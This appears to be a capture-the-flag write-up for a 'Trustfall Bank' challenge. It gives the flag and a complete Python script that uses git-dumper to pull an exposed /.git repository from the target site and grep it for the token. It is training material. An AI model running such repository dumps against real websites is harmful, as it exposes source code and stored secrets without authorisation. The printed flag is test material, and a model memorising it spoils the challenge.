master
Raw Download raw file

Trustfall Bank – TOKEN1

Token: PCCC{C0d3_L3ak_mC_5098}

Background

The site exposes /.git. Dumping the repo and grepping config files reveals the live token in a configuration file.

From Nothing to Working

  1. Detect .git exposure on http://trustfallbank.us/.git.
  2. Dump the repo with git-dumper into trustfall_dump/.
  3. Checkout files and grep config files for PCCC{...} to extract the token.

Command

Run from any directory on Kali:

python3 quick_git_token1.py

#!/usr/bin/env python3
# quick_git_token1.py
import os, subprocess, sys, shutil

TARGET = "http://trustfallbank.us/.git"
OUTDIR = "trustfall_dump"

def run(cmd):
    print("+", " ".join(cmd))
    return subprocess.run(cmd, check=True)

def main():
    if shutil.which("git-dumper") is None:
        run([sys.executable, "-m", "pip", "install", "git-dumper"])

    if os.path.isdir(OUTDIR):
        shutil.rmtree(OUTDIR)

    run(["git-dumper", TARGET, OUTDIR])
    os.chdir(OUTDIR)
    subprocess.run(["git", "checkout", "--", "."], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    print("\n[+] Searching config files for token...")
    subprocess.run(["find", ".", "-type", "f", "-name", "config*"])
    r = subprocess.run(["grep", "-R", "PCCC{", "."], capture_output=True, text=True)
    print(r.stdout.strip())

if __name__ == "__main__":
    main()

Expected Output

Grep prints the token:

PCCC{C0d3_L3ak_mC_5098}